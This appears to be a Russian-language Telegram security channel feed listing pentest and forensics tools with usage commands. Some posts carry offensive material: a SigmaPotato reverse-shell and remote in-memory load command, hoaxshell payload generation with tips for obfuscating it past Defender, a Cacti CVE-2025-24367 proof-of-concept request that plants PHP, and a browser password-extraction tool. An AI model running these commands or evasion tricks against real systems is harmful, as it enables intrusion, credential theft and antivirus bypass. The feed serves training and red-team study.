Whitehat Lab
2.05K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
🔄 😀 RustScan v2.4.1

Очень быстрый сканер портов написанный на Rust

Установка в Debian like:

sudo dpkg -i rustscan_(ver).deb

Использование:

rustscan -a 127.0.0.1,0.0.0.0
rustscan -a 192.168.0.0/30
rustscan -a 'hosts.txt'
rustscan -a 127.0.0.1 --range 1-1000

💻 Home
💻 Download

#rustscan #rust #soft #recon

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 HackBrowserData v0.4.6

Инструмент помогающий вспомнить "забытые" пароли от различных браузеров. Также извлекает 🍪 cookie, закладки и историю. Написан на 💻 Go

Поддержка браузеров в 💻 Windows:

Google Chrome
Chromium
Microsoft Edge
360 Speed
QQ
Brave
Opera
OperaGX
Vivaldi
Yandex
CocCoc
Firefox


Примеры использования:

hack-browser-data.exe -b all -f json --dir results --zip

hack-browser-data.exe -b chrome -p "C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"


💻 Home
💻 Download

#hackbrowserdata #golang #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 NTLM hashes database

Сервис уже не новый, но крайне полезный
Я немного запоздал с постом 😄👍

🔗 https://ntlm.pw

#ntlm #hash

✈️Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🖼️ Ferox buster v2.11.0

Современный высокоскоростной фаззер написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.

Kali:
sudo apt update && sudo apt install -y feroxbuster

Windows
via chocolatey:
choco install feroxbuster

Примеры:

feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx

feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"

feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080


💻 Home
👩‍💻 Docs

#feroxbuster #fuzzing #rust #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🏃 SigmaPotato 1.2.6

Инструмент для повышения привилегий в 🏠 Windows системах основанный на эксплоитах "картофельного" семейства (в частности GodPotato)
Напомню что для реализации необходимо чтобы УЗ обладала привилегией SeImpersonatePrivilege или SeAssignPrimaryTokenPrivilege

Обычно присутствует у сервисных УЗ, например IIS, MSSQL и т.д.

whoami /priv

Из плюсов возможность запуска как с диска, так и из памяти, а также создание revshell'a

Примеры:

./SigmaPotato.exe --revshell ip port

[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))

[SigmaPotato]::Main(@("--revshell","ip","port"))


Windows 8/8.1 - Windows 11
Windows Server 2012 - Windows 2022


💻 Home
💻 Download

#potato #lpe #windows #soft #sigmapotato

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🎟 btconverter

При пентесте 🪟 Active Directory очень часто приходиться работать с Kerberos и в частности с получением и использованием билетов

Для данных целей обычно используют следующие инструменты:

💻 Rubeus
💻 Impacket

При дампе или запросе в Rubeus мы получим закодированный в base64 билет

Если захотим использовать его в инструментах impacket, необходимо конвертировать в формат ccache

Обычно это делается так:

echo "doIGIDCCBhygAwIBBaE(..snip..)9SRzE3LkxPQ0FM" | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache


При получение билета в impacket будем конвертировать в обратном порядке. Иной раз делать это приходиться очень часто, поэтому написал небольшой скрипт для автоматизации данной задачи

Для работы скрипта в 💻 Kali есть все необходимые тулзы. Если по какой то причине impacket не установлен:

sudo apt update
sudo apt install python3-impacket


Далее ставим скрипт:

wget https://raw.githubusercontent.com/akhomlyuk/btconverter/main/btconverter.sh
chmod +x btconverter.sh
sudo mv btconverter.sh /usr/bin/btconverter


На вход принимает 1 аргумент, билет в формате .b64|kirbi|ccache

btconverter ticket.b64
btconverter ticket.ccache
btconverter ticket.kirbi

Готово!

💻 Home

#kerberos #tickets #bash #impacket #rubeus

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖼️ pspy v1.2.1

Отличный инструмент предназначенный для отслеживания процессов без необходимости использования root прав. Он позволяет видеть команды выполняемые другими пользователями, задания cron и т. д.
Написан на Go. Постоянно использую при решение машин на 🙃 HTB, 😁 THM и др. платформах.

Запуск в 🥸 Debian like:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

chmod +x pspy64
./pspy64

-r - список директорий для отслеживания (по дефолту /usr, /tmp, /etc, /home, /var и /opt)
-i - интервал в мс
-f - события файловой системы
--debug - вывод подробной информации


Готово, рекомендую!

💻 Home

#golang #pspy #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖼️ 🔄 Moriarty v1.2

Чекер CVEs и уязвимостей написанный на C# для ОС 🏠 Windows

Поддерживаемые версии:

Windows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)
Windows 11 (Versions: 21H2, 22H1, 22H2, 23H1)
Windows Server 2016, 2019, 2022


Список уязвимостей (35):

MS10-015
MS10-092
MS13-053
MS13-081
MS14-058
MS15-051
MS15-078
MS16-016
MS16-032
MS16-034
MS16-135
CVE-2017-7199
CVE-2019-0836
CVE-2019-0836
CVE-2019-1064
CVE-2019-1130
CVE-2019-1253
CVE-2019-1315
CVE-2019-1385
CVE-2019-1388
CVE-2019-1405
CVE-2020-0668
CVE-2020-0683
CVE-2020-0796
CVE-2020-1013
CVE-2020-1013
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
CVE-2021-44228
CVE-2021-36934
CVE-2022-40140
CVE-2022-22965
CVE-2023-36664


1.2 added:
2023-23397
2022-34718

👉 Описание уязвимостей

Также бот поддерживает поиск эксплоитов по CVE

!poc CVE-2019-1064

💻 Home

Для сборки понадобится Visual Studio и .NET Framework 4.8 Developer Pack

#moriarty #checker #csharp

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖼️ SharpCollection

Сборник скомпилированных C# инструментов для наступательной безопасности.
Для ленивых или когда под рукой нет 💻 VS

Некоторые:

➡️ SharpChisel
➡️ SharpKatz
➡️ SharpUp
➡️ Whisker
➡️ winPEAS
➡️ Certify
➡️ KrbRelay
➡️ Rubeus
➡️ RunasCs
➡️ Seatbelt

86 инструментов

💻 Collection

#csharp #collection #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ ffuf - Fuzz Faster U Fool v2.1.0

💻 Очень быстрый веб фаззер написанный на 🖼️ Go

Fuzzing
- перебор директорий, параметров, заголовков (headers)
ffuf поддерживает множество настроек, работа через прокси, различные фильтры (размер, кол-во строк, символов). GET/POST запросы.
В 💻 Kali установлен по умолчанию.

Установка:

go install github.com/ffuf/ffuf/v2@latest

Примеры использования:

ffuf -w /wordlists/rockyou.txt -u https://example.com/FUZZ
ffuf -w /wordlists/rockyou.txt -u https://example.com/page.php?FUZZ=1
ffuf -w /wordlists/rockyou.txt -u https://example.com -H "Host: FUZZ.example.com"


Основные фильтры:
fc - HTTP status (-fc 404)
fs - размер ответа (-fs 0)
fl - кол-во линий (-fl 16)
fw - кол-во слов (-fw 2)


Заворачиваем в 😈 Burp (proxy):

-x "https://127.0.0.1:8080"

Флаг -c сделает вывод цветным, рекомендую, по дефолту - False

💻 Home

#ffuf #fuzzing #fuzzer #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😁1
🏠 Кибербезопасность для новичков

7 уроков от Microsoft

Что охватывает курс 📚:

🔐 Основные концепции кибербезопасности, различия между рисками, угрозами и т.д.
🛡 Что такое меры безопасности и какие формы они могут принимать
🌐 Понимание того, что такое zero trust и почему это важно в современной кибербезопасности
🔑 Ключевые концепции и темы, связанные с идентификацией, сетевыми технологиями, операциями в области безопасности, инфраструктуры и защиты данных
🔧 Примеры инструментов, используемых для реализации мер безопасности

Чего курс не охватывает 🚫:

🚫 Как использовать конкретные инструменты безопасности
🚫 Hacking, red teaming/offensive security
🚫 Обучение стандартам соответствия

💻 Cybersecurity by microsoft

#microsoft #cybersecurity

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🥷 Autopsy v 4.22.0

Замечательный open source продукт которым пользуются кибер-криминалисты по всему миру. Это графический интерфейс для коллекции утилит под названием The Sleuth Kit (TSK)
Работает с образами дисков и не только, список поддерживаемых файловых систем: NTFS, FAT, ExFAT, UFS 1, UFS 2, EXT2FS, EXT3FS, Ext4, HFS, ISO 9660, и YAFFS2

В 🐧 Kali Linux имеется в репозиториях и ставится одной командой: sudo apt install autopsy

Также есть версии для Windows, Linux и OS X

➡️ Download
➡️ The Sleuth Kit
💻 Modules

#autopsy #sleuthkit #forensics #dfir

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🚩 Стеганография в изображениях

Основные инструменты:

😹 zsteg - комбайн по работе с PNG и BMP

gem install zsteg
zsteg -a pic.png


😹 png-parser - анализ PNG изображений

pip install --user git+https://github.com/Hedroed/png-parser
png-parser pic.png


🔠 steghide - извлекает данные из JPG

sudo apt install steghide
steghide extract -sf pic.jpg


😹 stegseek - самый быстрый брутер steghide файлов

sudo apt install ./stegseek_0.6-1.deb
stegseek pic.jpg rockyou.txt


😹 stegoveritas - очередной комбайн, разбирает по слоям, применяет кучу фильтров, результат сохраняет в отдельную директорию

pip3 install stegoveritas
stegoveritas pic.png


😹 stegsolve - Java приложение, работа со слоями, LSB, стереограмы

java -jar StegSolve.jar


🔠 exiftool - лучший инструмент по работе с метаданными

exiftool pic.png


🔠 exiftoolGUI - графический интерфейс для exiftool ( 📦 )
🔠 tweakpng - редактор метаданных в PNG ( 📦 )
🔠 pngcheck - анализатор PNG изображений

sudo apt install pngcheck
pngcheck -v pic.png


😹 stegpy - LSB

pip3 install stegpy
stegpy pic.png


🔠 OpenStego - очередная стегано утилита ( 📦 )
🔠 Magic Eye Solver - решение стереограм
🔠 Aperi Solve - веб сервис все в одном
🔠 Piet Solver - веб сервис решение Piet

#steganography #tools #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1
🏠 Living Off The Land Binaries, Scripts and Libraries

Шпаргалка по скриптам, библиотекам и бинарным файлам в ОС 🖼️ Windows

Вбиваем название утилиты и смотрим как с ней можно взаимодействовать
Например - Certutil.exe

Можем скачать файл из сети:

certutil.exe -urlcache -split -f https://7-zip.org/a/7z1604-x64.exe 7zip.exe


🪟 Lolbas

#lolbas #cheatsheet #windows #redteam

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 WADComs - это интерактивная шпаргалка, содержащая список ⚔️ RED Team инструментов с кратким описанием и командами, которые будут использоваться в средах 🏠 Windows/AD

Указываем доступный нам вид реквизитов (логин, пароль, хеш, билет и т.д.) и сервис покажет что и как мы можем использовать.

https://wadcoms.github.io

#windows #activedirectory #wadcoms #redteam

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🧩 hoaxshell

Генератор и обработчик полезной нагрузки для Windows через PowerShell. Написан на Python
Бонус: при небольшой обработке "напильником" обходим последний Defender со всеми апдейтами (см. картинку)

Установка:

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt


Примеры:
python3 hoaxshell.py -s 192.168.1.36 -iro -H "Authorization"


-i
- Invoke-RestMethod вместо Invoke-WebRequest
-r - Без кодирования в Base64
Нет смысла кодировать т.к. дорабатывать будем руками, все дефолтные методы "палятся" АВ
-o - Обфускация

Полезные ключи -ng и -lt для создания ngrok или localtunnel сессии

Ручная обфускация:

Надо заменить Invoke-RestMethod и Invoke-WebRequest на аналоги и/или напихать кавычек. Мы же любим кавычки ? 😃

Примеры:

i''nV''okE-R''eStMe''Th''oD
ir''M
i''eX
Ir''M

С реГисТром можно и нужно играться

😹 Home

#hoaxshell #powershell #python #soft #manual

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💉 Commix v4.0-stable

UPD. Большой апдейт до major ветки 4.0

Комбайн для эксплуатации Command Injection уязвимостей, написан на python 💻 Команды, ключи, вывод и все остальное очень похоже на SQLMap.

В 🐧 Kali предустановлен.

💻 Установка:

git clone https://github.com/commixproject/commix.git commix
python commix.py -h


"Детский" режим:

python commix --wizard


Обычный запуск:

python commix -u https://62.173.140.174:16016/ --data 'action='


Поддержка тамперов:

python commix -u https://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs


Список тамперов:

python commix --list-tampers

💻 Download
⚙️ Usage examples

#commix #python #pentest #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🏃 adPEAS 0.8.25

Отличный инструмент для проведения enumeration в 🏠 Active Directory

UPD. Добавили поддержку Windows 2025

Представлен в 2х вариантах, стандарт и лайт

Полная версия имеет встроенный модуль SharpHound для сбора информации в 😉 Bloodhound

Стандартный запуск:

Import-Module .\adPEAS.ps1
Invoke-adPEAS


Доступные модули:

Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках

Rights - поиск различных прав, например LAPS, DCSync и т.д.

GPO - базовая информация о групповых политиках

ADCS - информация о центрах сертификации

Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.

Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей

Accounts - информация об аккаунтах

Computer - AD DS, AD CS, Exchange серверы и т.д.

BloodHound - сборщик данных для BH


Варианты запуска:

Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor

Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'


Определенная УЗ:

$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)

Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred


Модули:

Invoke-adPEAS -Module Domain

Invoke-adPEAS -Module Rights

Invoke-adPEAS -Module GPO

Invoke-adPEAS -Module ADCS

Invoke-adPEAS -Module Creds

Invoke-adPEAS -Module Delegation

Invoke-adPEAS -Module Accounts

Invoke-adPEAS -Module Computer

Invoke-adPEAS -Module Bloodhound -Scope All


💻 Home

#soft #powershell #activedirectory #enumeration

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ Cacti CVE-2025-24367
Arbitrary File Creation leading to RCE


Позволяет аутентифицированному пользователю злоупотребить функциями создания графов и шаблонов графов для записи произвольных PHP-скриптов в корень сайта

PoC:
POST https://192.168.178.78/cacti/graph_templates.php?header=false HTTP/1.1
host: 192.168.178.78
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 804
Origin: https://192.168.178.78
Connection: keep-alive
Referer: https://192.168.178.78/cacti/graph_templates.php?action=template_edit&id=297&csrf_timeout=true&csrf_timeout=true
Cookie: CactiDateTime=Fri Jan 03 2025 14:03:51 GMT+0000 (Greenwich Mean Time); CactiTimeZone=0; Cacti=r378gdiav394djct96o26mliud; cacti_remembers=1%2C0%2C1ac46cea6e1f0225f6e52320b4d734503fac5215a76879b3cb2c939d5cc56c49
Priority: u=0

__csrf_magic=sid%3A3363ef9d47d62372302b4941b790e92f5f749d9c%2C1735913031&name=PING+-+Advanced+Ping&graph_template_id=297&graph_template_graph_id=297&save_component_template=1&title=%7Chost_description%7C+-+Advanced+Ping&vertical_label=milliseconds&image_format_id=3&height=200&width=700&base_value=1000&slope_mode=on&auto_scale_opts=1&upper_limit=10&lower_limit=0&unit_value=&unit_exponent_value=1&unit_length=&right_axis=&right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A&right_axis_format=0&right_axis_formatter=0&left_axis_formatter=0&tab_width=30&legend_position=0&legend_direction=0&rrdtool_version=1.7.2&action=save


🖥 Summary

#web #rce #cacti #cve

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️Онлайн инструменты для работы с JWT

JSON Web Token - специальный формат токена, который позволяет безопасно(в идеале 😁) передавать данные между клиентом и сервером.

Состоит из трёх частей: заголовок, пейлоад и подпись

➡️Мой любимый - https://token.dev
➡️По классике - https://jwt.io
➡️Еще неплохой вариант
➡️Отдельно декодер для Flask Session Cookie

Пример простейшей реализации на Python 🐍

import json
import hmac
import hashlib
import base64
import uuid

header = {"typ": "JWT", "alg": "HS256"}
payload = {"name": "exited3n", "isAdmin": True}
secret = str(uuid.uuid4())


def jwt_gen(header: dict, payload: dict, secret: str) -> bytes:
jwt_parts = []
json_header = json.dumps(header).encode()
json_payload = json.dumps(payload).encode()
jwt_parts.append(base64.urlsafe_b64encode(json_header))
jwt_parts.append(base64.urlsafe_b64encode(json_payload))

merge_payload_header = b'.'.join(jwt_parts)

signature = hmac.new(secret.encode(), merge_payload_header, hashlib.sha256).digest()
jwt_parts.append(base64.urlsafe_b64encode(signature))

return b'.'.join(jwt_parts)

print(f'Secret: {secret}')
print(jwt_gen(header, payload, secret))


#jwt #token #flask #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 Adalanche v2025.2.6

Обновление отличного кроссплатформенного инструмента для визуализации, построения графов, связей и исследования Active Directory.
Даст мгновенные результаты, показывая, какие разрешения имеют пользователи и группы в 💻 AD. Полезен для изучения того, кто может управлять учетными записями, машинами или всем доменом, и может использоваться для поиска и отображения неправильных конфигураций. Покажет проблемы делегирования, AD CS и многое другое.
Проект активно развивается. Написан на 💻

Отличия от 😉 BloodHound:

Не требуется Neo4J, Python
Не требуется предварительной настройки
Для построения запросов используется расширенный LDAP синтаксис
Наличие бесплатной и коммерческой версии


Машина в домене:

adalanche.exe collect activedirectory


Машина не в домене:

adalanche.exe collect activedirectory --ignorecert --domain contoso.local --authdomain CONTOSO --username dom_user --password P@ssw0rd


Будет создана папка data

Анализ:

adalanche.exe analyze


💻 Github
💻 Documentation
➡️ Commercial version

#adalanche #golang #soft #activedirectory

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍1